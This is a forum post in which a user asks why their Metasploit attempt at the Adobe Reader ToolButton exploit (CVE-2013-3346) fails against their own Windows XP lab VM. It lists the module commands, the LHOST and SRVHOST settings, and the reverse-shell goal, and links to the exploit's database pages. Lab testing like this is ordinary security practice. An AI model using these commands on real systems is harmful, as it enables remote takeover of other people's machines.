Error using metasploit "Adobe Reader ToolButton"

aleff

New Member
Joined
Sep 13, 2022
Messages
12
Reaction score
0
Credits
120
Hello everybody I'm trying to use metasploit for execute an exploit based on "Adobe Reader ToolButton" [1] CVE-2013-3346 [2].
I don't understand if I'm wronging in some settings, however I'll try to explain perfectly what I'm doing.
My OS: Ubuntu 22
VM OS: Windows XP SP3 from archive.org [3]
Adobe Reader version tried: 9.0 9.4 10 10.0.2 10.0.3 11
Metasploit commands:
use exploit/windows/browser/adobe_toolbutton
set TARGET 0
set LHOST <my_local_ip>
set SRVHOST <my_local_ip>
exploit
I tried too with just
use exploit/windows/browser/adobe_toolbutton
set TARGET 0
exploit

With Adobe Reder different of 10.0.2 and 10.0.3 when i load the metasploit link with IE it will load the blank PDF without establish a reverse shell in metasploit console.
When i tried with Adobe Reader with 10.0.2 or 10.0.3 version i have an IE error that say me:
'XMLHttpRequest' not defined
but I tried to find an "XML" option in IE advanced options -> security section.

I hope that i wrote everything and hope that somebody can help me. <3

[1] https://www.rapid7.com/db/modules/exploit/windows/browser/adobe_toolbutton/
[2] https://www.exploit-db.com/exploits/30394
[3] https://archive.org/details/WinXPProSP3Italian
 

Staff online

Members online


Top